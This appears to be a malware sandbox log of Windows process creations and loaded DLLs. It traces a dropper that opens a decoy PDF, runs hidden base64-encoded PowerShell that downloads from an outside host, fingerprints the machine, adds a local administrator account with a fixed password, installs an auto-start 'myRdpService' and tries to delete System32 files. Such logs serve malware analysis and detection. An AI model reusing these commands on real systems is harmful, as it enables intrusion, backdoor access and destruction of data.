Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lgpiiklc\lgpiiklc.cmdline"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AOQBhAGUAYQA4AGIAZgA4ADMAMwBjADgANwA3ADAAOQA1ADkAZABiADcAYwA3ADIAOABmADQAYwBjAGQAYwBmAGMAOABmADQAZQA5ADMAMABhAGYANABkAGQANAA0AGUANgA1ADIAMQAzAGIAOQBiADQAYQA0ADcAOABlADUAZgA4ADYAZABjADEAMQA5AGEAMAA4ADEAMAAxADkANABhADkAMAA4ADcANAA0ADAAYgA3ADkAMAAzADgAMgBlAGIANwAxADEANQBhADkAZAA2AGEAMwAzAGIAYwAwADIAMAAyADgAZQA1ADUANgA3ADgAYQBiAGUAMAAyAGEAZAA0ADUAZAA0ADgAZQA5AGEAZgBhADkAMwBhAGYAOAAzADcANQAzADEAZQAzADUAYgAxAGMAOAA4AGUANgBiAGYAYwBhAGYAYQAyADcAZAA4ADIAZQBlADIANAA0ADIAMAAzAGIAOAA2AGEANgA1ADAAYQBjAGYAMwAzADQANgAwADYANwA2AGUAMQA5AGUANABkADUAMABjAGMAYgBmADcAYgA3ADkANQA1ADcANQBiADQAOAAxAGUAYwA0AGQANAAzACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBEED.tmp" "c:\Users\user\AppData\Local\Temp\lgpiiklc\CSCCB9B20FB8C54707B662B684DAE4C90.TMP"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\AppData\Local\Temp\Company Booklet.pdf"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AOQBhAGUAYQA4AGIAZgA4ADMAMwBjADgANwA3ADAAOQA1ADkAZABiADcAYwA3ADIAOABmADQAYwBjAGQAYwBmAGMAOABmADQAZQA5ADMAMABhAGYANABkAGQANAA0AGUANgA1ADIAMQAzAGIAOQBiADQAYQA0ADcAOABlADUAZgA4ADYAZABjADEAMQA5AGEAMAA4ADEAMAAxADkANABhADkAMAA4ADcANAA0ADAAYgA3ADkAMAAzADgAMgBlAGIANwAxADEANQBhADkAZAA2AGEAMwAzAGIAYwAwADIAMAAyADgAZQA1ADUANgA3ADgAYQBiAGUAMAAyAGEAZAA0ADUAZAA0ADgAZQA5AGEAZgBhADkAMwBhAGYAOAAzADcANQAzADEAZQAzADUAYgAxAGMAOAA4AGUANgBiAGYAYwBhAGYAYQAyADcAZAA4ADIAZQBlADIANAA0ADIAMAAzAGIAOAA2AGEANgA1ADAAYQBjAGYAMwAzADQANgAwADYANwA2AGUAMQA5AGUANABkADUAMABjAGMAYgBmADcAYgA3ADkANQA1ADcANQBiADQAOAAxAGUAYwA0AGQANAAzACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAG	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.3.20269 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --mojo-platform-channel-handle=2224 --field-trial-handle=1636,i,4139433032823036426,1260113175703247658,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: unknown unknown
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \"
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc stop "myRdpService"
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto & net start "myRdpService"
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query myRdpService
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query myRdpService
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop "myRdpService"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query myRdpService
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete "myRdpService"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net start "myRdpService"
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 start "myRdpService"
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\regedit.exe "regedit.exe" /e "C:\Windows\Temp\regBackup.reg" "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService"
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "systeminfo \| Select-String \"OS Name\",\"OS Version\";"
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\System32\cmd.exe /c powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\systeminfo.exe "C:\Windows\system32\systeminfo.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
